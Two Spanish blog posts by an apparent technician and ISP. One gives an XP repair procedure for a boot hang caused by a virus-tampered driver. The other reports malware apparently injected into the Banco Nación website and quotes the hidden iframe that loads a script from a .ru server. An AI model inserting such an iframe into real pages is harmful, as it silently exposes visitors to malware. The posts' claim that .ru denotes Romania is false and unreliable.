Netcrash

MODO A PRUEBA DE FALLOS SE CUELGA DESPUES DE CARGAR ISAPNP.SYS Esta semana tuve dos maquinas con el mismo problema. Asi que tuve que ponerme a investigar. La PC se tilda con pantalla negra al arrancar windows. En modo a prueba de fallos, una pista: El arranque se cuelga despues de cargar el driver ISAPNP.SYS Diagnostico: ISAPNP.SYS es el ultimo driver del grupo "reservados del sistema". Luego XP carga el grupo "BOOT BUS EXTENDER" (no quiero meter la pata con la traducción, asi que lo dejo tal cual lo encontre en MicroSoft). Algunos virus inyectan su codigo dentro de drivers de este grupo, y si algo sale mal o el antivirus elimino el codigo, XP se colgara al cargarlo. Solucion: ¡OJO! Hay que tocar sonar delicadas, asi que ante cualquier duda consulte a su medico o tecnico amigo. Arrancar la pc con algun Live CD. A mi me gusta el MINI PE pero cualquiera deberia servir. Tambien sirve colocar el disco en otra PC como disco secundario. Ingresar a Windowssystem32drivers y buscar algun archivo extraño. En mis dos casos encontre archivos de nombres raros (Tipo XFZWXD.SYS) con tamaño 0 kb. Eliminarlo. (si no tiene tamaño 0, por las dudas mejor solo moverlo a otra ubicacion) Editado 21/05/2010: Y como muy bien me acotaron Carlomagno y Hosopolar generalmente estos archivos tienen fecha reciente. Normalmente con esto ya deberia arrancar. Usando RegEdit busca el nombre del archivo eliminado y elimina la entrada. (Recomiendo primero hacer un backup en un archivo .reg!!!!) Es muy posible que el virus haya dejado algo mas para asegurarse la ejecución en el arranque, asi que busca tambien en HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun ¡¡SUERTE!!

ESPERO ESTAR METIENDO LA PATA ... Y QUE TODO SEA UNA EQUIVOCACION. Esta historia comienza con una clienta coqueta. Hace unas horas recibí un llamado de una cliente que me dice algo como: “Entre a la pagina del Banco Nación para hacer una transferencia, y ya que estaba entre a curiosear unas ofertas de un botón “PARA ELLAS” y el antivirus me dice que tiene VIRUS!” Estuve muy tentado, reconozco, de desestimar sus palabras con un tranquilizador “No te preocupes, Mujer, ¡Es el Banco Nación, el depositario de nuestros dineros, el guardián de nuestros ahorros! ¡Tienen cientos de ingenieros informáticos velando por nosotros!” Por suerte no lo hice. Y por el contrario, mientras hablaba con ella, entre al Banco Nación (www.bna.com.ar), y busque el bendito botón. Un hermoso Botón fucsia animado, que dice “PARA ELLAS”, muy bien ubicado en la HOME PAGE, que nos lleva a la página (http://www.bna.com.ar/bp/bp_mujer_promociones.asp) Al desplegar la página mi antivirus (AVG de GRISOFT – ¡GRATUITO!) también saltó, con el cartel que pueden ver abajo. ¡UN VIRUS EN LA PAGINA DEL BNA! Si leen atentamente el aviso del AVG, la amenaza se encuentra en el archivo: Baybear.ru:8080/index.php?pid=13 .ru? Rumania? El paraíso de los hackers? Una referencia a un servidor rumano en la web del Banco Nación? Descargue el código fuente de la página y si bien no encontré en ningún lugar “Baybear.ru” si encontré (y en muchas partes de esta pagina, y sin ningún motivo aparente en la web), lo siguiente: <iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe> ¡De nuevo un servidor rumano! Para quien no este ducho en diseño web, el comando IFRAME permite meter dentro de una página WEB el contenido de otra página web. El comando en cuestión (QUE ESTA DENTRO DEL CODIGO FUENTE DE LA PAGINA DEL BANCO NACION!) inserta dentro la pagina del BNA el contenido del archivo go.php del servidor nemohuildiin.ru . Y en realidad este archivo es un archivo PHP, es decir, no es un texto plano, sino que el servidor procesara comandos ubicados dentro del archivo. La referencia a “Baybear.ru” esta dentro de ese archivo. Es decir, cuando nuestra PC carga la pagina del BNA, el comando IFRAME le indica que debe cargar ese archivo. Nuestra PC entonces se comunica con nemohuildiin.ru para pedirle el archivo go.php. Este servidor, procesa este archivo (que vaya a saber que maléficas ordenes contendrá) y como resultado le entrega algo a nuestra PC. Entre ese algo – Que sinceramente no se que será. Mis conocimientos no dan para tanto – también llega la orden para conectarnos a Baybear.ru para traernos otro archivo. Y ahí es donde interviene AVG, salvándonos del desastre. O al menos, todo esto es lo que yo creo que esta pasando. Buscando en la web, ese comando IFRAME aparece en varias paginas Tambien encontré un par de foros donde algunos usuarios plantearon también que su antivirus empezó a reportar VIRUS en sus paginas empresariales, con este mismo código IFRAME (Todos los post son de AYER). Como soy ISP, y para evitar las infecciones de mis usuarios si es que esto realmente es un virus, lo que hice fue configurar en el DNS de mi router principal (en mi caso, un mikrotik) un ruteo estatico de nemohuildiin.ru a 127.0.0.1. ¡Si alguien tiene mas información, AVISEE ! Si esto es una falsa alarma, sepan disculpar. En realidad seria bueno estar equivocado... porque este virus parece haber infectado unas cuantas Web Pages.